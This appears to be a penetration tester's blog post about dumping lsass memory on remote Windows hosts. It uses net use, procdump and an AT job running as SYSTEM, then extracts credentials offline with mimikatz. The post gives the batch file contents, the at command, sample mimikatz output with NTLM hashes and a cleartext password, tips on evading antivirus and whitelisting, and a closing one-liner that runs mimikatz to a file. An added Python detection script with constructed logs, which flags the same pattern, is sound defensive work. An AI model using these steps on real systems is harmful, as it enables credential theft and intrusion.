I tweeted about this blog post a few weeks ago and got to use it on a PT, so it's no secret...
Also mubix beat me to this post, but I'm posting it here for my own note-keeping purposes.
First, check out this post by the mimikatz author. Now, one of the Twitter comments I received was: "duh anyone can right click and dump process memory to a file". Unfortunately I'm rarely sitting with a GUI where I can just "right click", but I do usually have the ability to "net use" and create scheduled tasks. The cool thing about AT jobs and scheduled tasks is that if you run them as "admin" they really get run as SYSTEM, so you can do neat stuff like dump lsass memory or get SYSTEM shells when the job executes your binary.
So, quickly, here's how I've been doing it.
Once you have creds, you net use the remote box and copy over procdump.exe and procdump.bat.
Contents of procdump.bat:
@echo off
C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\somethingwindows.dmp 2>&1
Then just create an "at" job to run it for you:
at \\192.168.1.3 20:55 C:\windows\temp\procdump.bat
From there you'll have a dump file. Copy it back from the remote host and use mimikatz alpha to retrieve the creds from the dump file. From the mimikatz blog post:
mimikatz # sekurlsa::minidump lsass.dmp
Switch to minidump
mimikatz # sekurlsa::logonPasswords
Authentication Id: 0; 141237
User Name: sekur_000
Domain: WINDOWS-8
msv:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* LM: d0e9aee149655a6075e4540af1f22d3b
* NTLM: cc36cf7a8514893efccd332446158b1a
tspkg:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* Password: waza1234 /
WDigest:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* Password: waza1234 /
livessp:
* Username: sekurlsa@live.fr
* Domain: ps: password
* Password: waza1234 /
kerberos:
ssp:
Why not just push up mimikatz? Well, the mimikatz you download is now tagged by AV, so you can compile your own and get around that; whitelisting tools should prevent mimikatz from running but will probably allow Sysinternals tools or PowerShell. But mostly this method makes it so you don't need a meterpreter session or any other type of interactive shell on the remote host: run the bat file, get your dump file, and get the creds offline.
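The flip side of the above, for anyone defending against it: because procdump is a signed Sysinternals binary and the AT job runs it as SYSTEM, neither AV nor application whitelisting is likely to stop it, so the useful signal is the command line. The script below is an added example (not from the original post, and not a Sysinternals or mimikatz tool) that runs two simple rules over process-creation telemetry: a process whose command line names lsass together with a full-dump switch (-ma / -mp) or a .dmp output path, and a .bat under \windows\temp launched as SYSTEM by the Task Scheduler host. It assumes command-line logging is enabled (Sysmon event 1, or Security event 4688 with command-line auditing on) and that the events have been flattened to the pipe-separated "timestamp | host | user | parent image | image | command line" layout used here; the log lines themselves are constructed for this example, as are the hostname and the taskeng.exe/svchost.exe list of scheduler host images.

```python
"""Flag process-creation events matching the lsass-dump-via-AT-job pattern.

Added example; not part of the original post. Input format is an assumed,
flattened form of Sysmon event 1 / Security 4688 data:
    timestamp | host | user | parent image | image | command line
"""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample telemetry (not real logs). The third line is the
# procdump.bat command from the post, launched by the scheduled task.
SAMPLE_LOG = r"""
2013-04-02T20:54:58Z | FILESRV01 | NT AUTHORITY\SYSTEM | C:\Windows\System32\services.exe | C:\Windows\System32\svchost.exe | svchost.exe -k netsvcs
2013-04-02T20:55:00Z | FILESRV01 | NT AUTHORITY\SYSTEM | C:\Windows\System32\taskeng.exe | C:\Windows\System32\cmd.exe | cmd.exe /c C:\windows\temp\procdump.bat
2013-04-02T20:55:01Z | FILESRV01 | NT AUTHORITY\SYSTEM | C:\Windows\System32\cmd.exe | C:\windows\temp\procdump.exe | C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\somethingwindows.dmp
2013-04-02T20:55:30Z | FILESRV01 | CORP\jsmith | C:\Windows\explorer.exe | C:\Windows\System32\notepad.exe | notepad.exe report.txt
2013-04-02T21:00:00Z | FILESRV01 | NT AUTHORITY\SYSTEM | C:\Windows\System32\taskeng.exe | C:\Windows\System32\cmd.exe | cmd.exe /c C:\Scripts\nightly-backup.bat
2013-04-02T21:10:12Z | FILESRV01 | CORP\backup_svc | C:\Windows\System32\cmd.exe | C:\Tools\procdump.exe | procdump.exe -accepteula -ma w3wp.exe C:\dumps\w3wp.dmp
"""


@dataclass
class Event:
    ts: str
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    ts: str
    host: str
    rule: str
    detail: str


def parse_log(text: str) -> List[Event]:
    """Parse the pipe-separated layout into Event records; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != 6:
            raise ValueError(f"malformed line: {line!r}")
        events.append(Event(*parts))
    return events


# Rule 1 pieces: "lsass" in the command line plus a procdump full-dump
# switch (-ma full, -mp mini-plus) or a .dmp output path.
LSASS_RE = re.compile(r"\blsass(\.exe)?\b", re.IGNORECASE)
DUMP_RE = re.compile(r"(\s-m[ap]\b|\.dmp\b)", re.IGNORECASE)

# Rule 2 pieces: a batch file under \windows\temp, run as SYSTEM, whose
# parent is a Task Scheduler host (assumed image names for the example).
TEMP_BAT_RE = re.compile(r"\\windows\\temp\\[^\s\"]+\.(bat|cmd)\b", re.IGNORECASE)
SCHEDULER_HOSTS = {"taskeng.exe", "svchost.exe"}
SYSTEM_ACCOUNTS = {"NT AUTHORITY\\SYSTEM", "SYSTEM"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: List[Event]) -> List[Finding]:
    findings = []
    for ev in events:
        # Rule 1: something other than lsass itself is writing a dump of lsass.
        if (basename(ev.image) != "lsass.exe"
                and LSASS_RE.search(ev.cmdline)
                and DUMP_RE.search(ev.cmdline)):
            findings.append(Finding(ev.ts, ev.host, "lsass_memory_dump", ev.cmdline))
        # Rule 2: the scheduler launched a .bat from \windows\temp as SYSTEM.
        if (ev.user.upper() in SYSTEM_ACCOUNTS
                and basename(ev.parent) in SCHEDULER_HOSTS
                and TEMP_BAT_RE.search(ev.cmdline)):
            findings.append(Finding(ev.ts, ev.host,
                                    "scheduled_bat_from_temp_as_system", ev.cmdline))
    return findings


def run_sample() -> List[Finding]:
    """Run both rules over the constructed sample; returns two findings."""
    return detect(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.ts} {f.host} [{f.rule}] {f.detail}")
```

On the sample, the nightly-backup task (SYSTEM, scheduler parent, but under C:\Scripts) and the IIS worker-process dump (procdump, but not of lsass) are left alone, while the two lines that reproduce the post's procedure are flagged. Rule 2 is deliberately narrow to a temp directory; in a real environment you would pair it with the scheduled-task-creation audit event (Security 4698) to see the job being registered before it fires.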
------
If for some reason you want to run mimikatz via a bat file, you can use the following commands:
type schtask.bat
C:\temp\mimikatz64.exe "sekurlsa::logonPasswords full" exit >> C:\temp\mimi.txt
Then you can run it with an at job.
-CG